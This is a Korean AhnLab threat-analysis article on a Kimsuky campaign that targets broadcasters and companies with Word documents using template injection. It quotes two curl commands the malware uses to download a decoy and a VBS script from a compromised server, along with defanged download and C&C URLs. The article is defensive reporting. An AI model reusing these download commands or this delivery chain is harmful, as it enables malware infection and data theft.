보안 이슈

AhnLab 보안 전문가의 심층분석! 보안 이슈 정보를 전해드립니다.

김수키 악성코드 유포 재개! 타겟은 방송사와 일반 기업

  • Facebook에 공유하실 수
    있습니다.

  • Twitter에 공유하실 수
    있습니다.

  • Linked in

    Linked in에 공유하실 수
    있습니다.

  • 붙여넣기

    블로그나 게시판에 붙여넣기 하실
    수 있습니다.

  • AhnLab
  • 2023-02-08

최근 북한 해킹 조직 김수키(Kimsuky)가 만든 악성코드가 방송 및 일반 기업을 표적으로 삼고 있다. 이 악성코드는 올해 110일 원고 청탁서로 위장해 안보 분야 종사자를 대상으로 유포된 바 있다. 이번에는 자기소개서, 앱 서비스 제안서 등의 형태로 유포되고 있으며, 기존과 동일하게 워드(Word) 문서 내 외부(External) 연결 기능으로 추가 악성 매크로를 실행하는 템플릿 인젝션(Template Injection) 기법이 사용됐다.

 


 

[그림 1] \word\_rels\settings.xml.rels 에서 확인된 External URL

 

유포가 확인된 파일명은 다음과 같다.

 

Ÿ   [kbs 일요진단]질문지.docx

Ÿ   ** 자기소개서.docx

Ÿ   app-planning – copy.docx

 


[그림 2] 정상 문서(1)


[그림 3] 정상 문서(2)

 


[그림 4] 정상 문서(3)

 

공격자는 악성 매크로 코드가 실행되도록 매크로 실행을 유도하는 이미지를 사용했다. 해당 이미지는 동일한 공격자가 과거부터 꾸준히 사용해 온 것으로 추정된다.

 

 

[그림 5] 매크로 실행을 유도하는 이미지

 

추가로 확인된 악성 워드 매크로 문서 다운로드 URL은 다음과 같다.

 

Ÿ   hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload2/init.dotm

Ÿ   hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/init.dotm

Ÿ   hxxp://jooshineng[.]com/gnuboard4/adm/img/ghp/up/state.dotm

Ÿ   hxxp://gdtech[.]kr/gnuboard4/adm/cmg/attatch/init.dotm

Ÿ   hxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/init.dotm

 

다운로드한 문서 파일에 포함된 악성 매크로가 실행되면 cURL(Client URL) 명령어가 포함된 version.bat 파일을 생성 및 실행한다. 이 배치 파일(*.bat)에는 정상 문서와 추가 악성 스크립트 다운로드 및 실행 코드가 들어있다. cURL 명령어는 통신 프로토콜을 이용해 서버에 데이터를 전송하거나 가져올 때 사용하기 위한 명령 줄 툴 및 라이브러리로, 이번 공격에는 아래 2가지가 사용됐다.

 

Ÿ   curl -o “”” & fname & “”” hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/state.docx

Ÿ   curl -o %temp%\temp.vbs hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/list.php?query=60

 

추가 악성 스크립트는 아래의 정보를 C&C 서버로 유출한다.

 

Ÿ   감염 PC 시스템 정보

Ÿ   시스템에 설치된 바이러스 백신 정보

Ÿ   최근 연 워드 문서 목록

Ÿ   시스템 내 다운로드 폴더 경로 정보

Ÿ   실행 중인 프로세스 정보

Ÿ   IE 관련 레지스트리키 수정

Ÿ   C&C 서버 연결 지속성을 위한 작업 스케줄러 등록

 

확인된 C&C 서버는 다음과 같다.

 

Ÿ   hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/show.php

Ÿ   hxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/show.php

Ÿ   hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/show.php

 

이처럼 처음에 대북 관련 인사를 겨냥했던 악성코드가 이제 일반 기업 사용자를 대상으로도 유포되고 있다. 발신자를 알 수 없는 메일의 첨부파일은 열람을 자제하고 오피스 문서에 포함된 매크로가 자동으로 실행되지 않도록 주의해야 한다.

 

자세한 내용은 ASEC 블로그에서 확인할 수 있다.

ASEC 블로그 바로가기

  • AhnLab 로고
  • 콘텐츠기획팀
  • Facebook에 공유하실 수
    있습니다.

  • Twitter에 공유하실 수
    있습니다.

  • Linked in

    Linked in에 공유하실 수
    있습니다.

  • 붙여넣기

    블로그나 게시판에 붙여넣기 하실
    수 있습니다.

지금 마케팅 안내 수신 동의하고
선물 받아가세요!

이벤트 내용 더 보기
세미나/제품/이벤트 안내

더 알아보기

개인정보 수집 및 이용 동의서

선물 발송을 위해 아래와 같이 개인정보를 수집 및 사용합니다.
동의를 거부할 수 있으나, 동의 거부 시 이벤트 참여가 불가능 합니다.

  1. ㆍ수집 항목 : 이름, 휴대전화번호
  2. ㆍ수집 목적 : 참여자 중복 확인, 공지 발송, 경품 발송
  3. ㆍ보유기간 : 이벤트 종료 후 지체 없이 파기(단, 당첨자의 경우 경품 배송 후 30일)
  4. ㆍ경품 발송 위탁: 쿠프마케팅 (모바일상품권 발송업체)
참여하기
닫기